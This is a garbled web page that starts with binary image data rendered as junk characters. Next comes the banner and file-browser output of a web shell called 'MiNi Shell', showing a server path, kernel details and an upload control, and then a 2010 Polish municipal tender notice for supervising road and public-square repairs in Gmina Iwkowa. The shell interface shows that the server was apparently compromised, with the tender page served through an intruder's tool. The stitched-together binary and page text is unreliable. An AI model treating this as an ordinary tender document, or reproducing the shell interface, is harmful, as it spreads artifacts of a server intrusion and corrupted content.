JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100414/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100414/84363-N-2010.html

<p class="kh_header"><b>Iwkowa: Sprawowanie nadzoru inwestorskiego nad realizacją zadań w Gminie Iwkowa</b><br>
<b>Numer ogłoszenia: 84363 - 2010; data zamieszczenia: 14.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Iwkowa , Iwkowa 468, 32-861 Iwkowa, woj. małopolskie, tel. 014 68-44-010, 68-44-020, faks 014 6844060.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.iwkowa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprawowanie nadzoru inwestorskiego nad realizacją zadań w Gminie Iwkowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest pełnienie funkcji inspektora nadzoru inwestorskiego 
       nad realizacją zadań pn.
1)	Organizowanie przestrzeni publicznej wsi Iwkowa i Kąty poprzez remont i modernizację placów publicznych i miejsc postojowych, w miejscowościach Iwkowa i Kąty, gmina Iwkowa, powiat brzeski, województwo małopolskie.
2)	Remont drogi gminnej Dobrociesz-Nawsie ETAP II od km 0+900 do km 1+900
                  w miejscowości Dobrociesz, gmina Iwkowa, powiat brzeski, województwo
                   małopolskie.
3)	 Remont drogi gminnej Porąbka Iwkowska-Drużków Pusty od km 0+000 
          do km 1+240 w miejscowościach: Porąbka Iwkowska, Drużków Pusty , 
          gmina Iwkowa, powiat brzeski, województwo małopolskie.

W ramach poszczególnych zadań Wykonawca zapewnia nadzór inwestorski  w pełnym          zakresie .

2.	Zamawiający dopuszcza możliwość wglądu do dokumentacji technicznej dla zadań wymienionych w pkt. I 1  w siedzibie Zamawiającego, pok. nr 13 (wejście B) lub na stronie internetowej Zamawiającego www.iwkowa.pl  (ogłoszenia dot. wszczęcia postępowań przetargowych wraz z SIWZ dla zadań określonych w pkt. I 1)   .

3.	Zakres  obowiązków i zadania inspektora nadzoru:  
1)	Realizacja praw i obowiązków wynikających z ustawy  z dnia 7 lipca 1994 r. Prawo budowlane (tekst jedn. Dz.U. z 2006 r Nr 156, poz. 1118 z póź. zm.) - art. 25, 26 i 27 odnośnie praw i obowiązków inspektora nadzoru .
2)	Obecność na terenie robót z częstotliwością uwzględniającą specyfikę realizowanych robót , jednakże nie rzadziej niż  dwa razy w tygodniu, a także na wezwanie Wykonawcy i Zamawiającego .
3)	Kontrola ilościowa i jakościowa realizowanych robót.
4)	Udział w przekazywaniu placu budowy.
5)	Udział w naradach roboczych organizowanych  przez Zamawiającego.
6)	Współdziałanie z Wykonawcą robót na placu budowy.
7)	Informowanie inwestora o zaawansowaniu rzeczowo-finansowym robót.
8)	Udział w komisjach szacowania ewentualnych szkód.
9)	Sporządzanie finansowo - rzeczowego rozliczenia końcowego realizowanego zadania.
10)	Udostępnianie dokumentów (związanych z realizowanym zadaniem)   wszystkim  Kontrolującym przedstawicielom instytucji wynikających z przepisów  Prawa Budowlanego  oraz  innych  przepisów obowiązujących w tym zakresie .
11)	Dbanie o jakość robót, tempo robót, odbiory robót w zgodności z dokumentacją projektową, specyfikacjami technicznymi .
12)	Wydawanie poleceń, decyzji, opinii, zgody  i akceptacji w formie ustnej i pisemnej, które są obowiązujące dla Wykonawcy robót oraz udzielanie Wykonawcy wszelkich wyjaśnień i wskazówek (w przypadku konieczności konsultuje się z projektantem przed udzieleniem wyjaśnień).
13)	Decydowanie o dopuszczeniu do stosowania lub odrzuceniu materiałów, prefabrykatów i wszystkich elementów  oraz urządzeń przewidzianych do realizacji robót. Żądania wykonania dodatkowych badań przez Wykonawcę robót materiałów budzących wątpliwości, co do jakości oraz akceptowania receptur i technologii zgodnie z wymaganiami Specyfikacji Technicznych . Decyzje te muszą być oparte na wymaganiach określonych w dokumentacji projektowej, specyfikacji technicznej oraz normach i przepisach związanych z realizacją robót.
14)	Dokonanie  sprawdzenia projektu budowlanego oraz Specyfikacji Technicznych Wykonania i Odbioru Robót przed rozpoczęciem robót budowlanych w zakresie sprawowanego nadzoru.  Zauważone błędy Inspektor Nadzoru wyjaśnia i uzgadnia          z projektantem.
15)	Uzgadnianie z autorem projektu możliwości wprowadzenia rozwiązań zamiennych              w stosunku do przewidzianych w projekcie (jeżeli zaistnieje taka konieczność).
16)	Ponoszenie odpowiedzialności za realizację robót zgodnie z warunkami  ustalonymi                    w  zgłoszeniu robót budowlanych  oraz uzgodnieniach opiniujących realizację inwestycji i sprawdzają realizację tych ustaleń przez wykonawcę robót budowlanych.
17)	Wstrzymywanie robót w wypadku prowadzenia ich przez Wykonawcę niezgodnie 
z umową lub przepisami BHP .
18)	Przestrzeganie prawidłowości wpisów do dziennika budowy pod względem obowiązującej chronologii i postępu prac budowlanych.
19)	Sprawdzanie jakości wykonanych robót i w razie konieczności powiadamianie Wykonawcy o wykrytych wadach oraz poświadczanie usunięcia wad przez Wykonawcę a także ustalania rodzaju i zakresu koniecznych do wykonania robót poprawkowych.
20)	Ustalanie metod obmiaru robót i uczestniczenie przy dokonywaniu obmiarów robót przez Wykonawcę .
21)	Uzgadnianie z Zamawiającym zakresu robót dodatkowych lub zamiennych                           i przygotowanie dla tych prac wniosku uzasadniającego wraz z kalkulacją kosztów.
22)	Przygotowanie opinii wraz z uzasadnieniem w przypadku spraw spornych                             z Wykonawcą oraz przedłożenie do rozstrzygnięcia Zamawiającemu.
23)	Dokonanie odbioru technicznego: gotowych elementów , robót zanikających, robót dodatkowych, ulegających zakryciu, odbioru częściowego.
24)	Potwierdzenie terminu zakończenia nadzorowanych robót, wpisem do dziennika budowy .
25)	Uczestniczenie w pracach komisji odbioru robót w tym końcowego odbioru robót, powoływanej przez Zamawiającego. 
26)	Sprawdzanie i zatwierdzanie do zapłaty kosztorysów (jeżeli takie występują)  po wykonaniu robót i faktur za wykonane roboty .
27)	Sprawdzanie  kompletności dokumentacji powykonawczej.
28)	Przygotowanie i przedłożenie Zamawiającemu sprawozdania końcowego z realizacji inwestycji w terminie do 15 dni od daty podpisania  protokołu końcowego odbioru robót .
29)	Ponoszenie odpowiedzialności za wszelkie podjęte przez siebie decyzje.  
30)	Zapewnienie we własnym zakresie w ramach wynagrodzenia umownego  zapewni :
-	transport na potrzeby własne na placu budowy,
-	niezbędny sprzęt oraz wyposażenie na potrzeby własne na terenie budowy,
-	środki łączności (telefon, internet itp.)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający udzieli zamówień uzupełniających w przypadku zaistnienia okoliczności, 
o których mowa w art. 67 ust. 1 pkt 6 Pzp:
Zamawiający przewiduje udzielenie, w okresie 3 lat od udzielenia zamówienia podstawowego, 
dotychczasowemu wykonawcy usług  zamówień uzupełniających, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień   i zamówienie uzupełniające jest zgodne z przedmiotem zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy  - wg wzoru zał. nr 1 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	Oświadczenie Wykonawcy  - wg wzoru zał. nr 1 do SIWZ.
b)	Wykonawca wykonywał  również wykonuje w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres  prowadzenia działalności  jest krótszy - w tym okresie usług polegających na pełnieniu funkcji inspektora nadzoru na budowie, przebudowie albo remoncie dróg, placów lub chodników na minimum 10 zadaniach. Na potwierdzenie spełnienia tego warunku Wykonawca załączy wykaz wykonanych również wykonywanych usług  (wg wzoru zał. nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełnienie warunku dysponowania odpowiednim potencjałem 
technicznym niezbędnym do realizacji zamówienia jeżeli Wykonawca złoży oświadczenie Wykonawcy - wg wzoru  zał. nr 1 do SIWZ  .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	Oświadczenie Wykonawcy  - wg wzoru zał. nr 1 do SIWZ.
b)	Zamawiający wymaga od Wykonawcy aby dysponował lub będzie dysponował odpowiednio wykwalifikowanymi osobami posiadającymi uprawnienia budowlane odpowiednie do zleconego zakresu zamówienia w specjalności drogowej , a także byli członkami właściwej Izby Samorządu Zawodowego .
Na potwierdzenie tego warunku Wykonawca przedłoży oświadczenie , że osoby ,
które będą uczestniczyć w wykonywaniu zamówienia , posiadają wymagane uprawnienia wraz z wykazem tych osób - wg wzoru zał. nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy  - wg wzoru zał. nr 1 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz oferty - wg wzoru zał. Nr 4 do SIWZ.
2.	Parafowany przez Wykonawcę wzór umowy -  zał. Nr 5 do  SIWZ.
3.	Pełnomocnictwo w przypadku wspólnego ubiegania się o udzielenie zamówienia. 
Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu 
o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy 
w sprawie zamówienia publicznego (art. 23 ust. 2 ustawy PZP).
4. Dokumenty wymagane w przypadku składania oferty wspólnej.
Oferta winna zawierać dokumenty określone w pkt.VIII.1.1 SIWZ, VIII.2 SIWZ, VIII.3  SIWZ  dla każdego partnera  z osobna, pozostałe dokumenty składane są wspólnie.

5. W przypadku gdy Wykonawca zamierza powierzyć część zamówienia podwykonawcom musi określić dokładny zakres zamówienia powierzonego im do wykonania. 
6. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. VIII.3.1, VIII.3.2  SIWZ  zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. 

7. Dokumenty o których mowa w pkt. VIII.3  SIWZ  mają być wystawione  
w terminach określonych w §4 ust.2 rozporządzenia Prezesa Rady Ministrów 
z 30.12.2009r w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form w jakich te dokumenty mogą być składane (Dz.U.Nr 226, poz. 1817 z 2009r) .
8. Zgodnie z art. 26 ust.2 ustawy PZP załączą dokumenty wymienione w § 1 ust. 1 
pkt 3,  6, 7  i  w § 1 ust. 2 i 3 oraz  § 2 ust. 1 pkt 1 Rozporządzenia Prezesa Rady Mini-strów z dnia  30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane  (Dz.U. z  2009 roku,  Nr 226, poz. 1817 ), oraz spełnią  wymogi art. 26 ust 2a, 2b, 2c  ustawy PZP.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że Zamawiający przewidział możliwość dokonania takiej zmiany w ogłoszeniu o zamówieniu lub w SIWZ oraz określił warunki takiej zmiany.
1.	Istotne postanowienia do umowy zostały określone we wzorze umowy stanowiącym załącznik  nr 5 do SIWZ.              
2.	Zamawiający dopuszcza wprowadzenie zmian postanowień zawartej umowy  w stosunku do treści oferty, jeżeli konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili  zawarcia umowy lub zmiany te są korzystne dla 
Zamawiającego.
3.	Zamawiający określa warunki wprowadzenia wymienionych zmian tj.:
a)	zmiana ceny za wykonanie zamówienia zostanie dokonana na podstawie cen wynikających z wynagrodzenia Wykonawcy/ów robót określonych w zawartych umowach na wy-konanie robót określonych w pkt. I.1 SIWZ .
b)	zmiana nazwy Zamawiającego lub nazwy Wykonawcy,
c)	zmiana konta bankowego Wykonawcy, 
d)	zmiana osób reprezentujących, w przypadku zmian organizacyjnych,
e)	zmiana urzędowej stawki VAT,
f)	zmiany spowodowane szczególnymi warunkami atmosferycznymi i zdarzeniami losowymi, które utrudniają lub uniemożliwiają realizację zamówienia w umowny sposób,
g)	zmiany osób przy pomocy których Wykonawca realizuje przedmiot umowy na inne pod warunkiem, że osoby te będą spełniały wymagania określone w ogłoszeniu 
o zamówieniu  i  SIWZ ,
h)	w każdym przypadku, gdy zmiana jest korzystna dla Zamawiającego,
i)	siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z  SIWZ, 
j)	konieczność wykonania robót dodatkowych, od których zależy należyte wykonanie przedmiotu zamówienia,
k)	zmiana wysokości całkowitego wynagrodzenia w przypadku zwiększenia zakresu robót np. konieczność wykonania robót dodatkowych,
l)	zmniejszenie zakresu rzeczowego realizowanego zadania,
m)	zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy, 
n)	zmiana terminu realizacji umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.iwkowa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Iwkowa 32-861 Iwkowa 468.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.04.2010 godzina 09:00, miejsce: siedziba Zamawiającego - Urząd Gminy w Iwkowej,  32-861  Iwkowa 468,  (wejście A),  sekretariat -  pokój nr  5..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane będzie przy udziale środków Unii Europejskiej w ramach działania 313,322,323 Odnowa i rozwój wsi objętego PROW na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com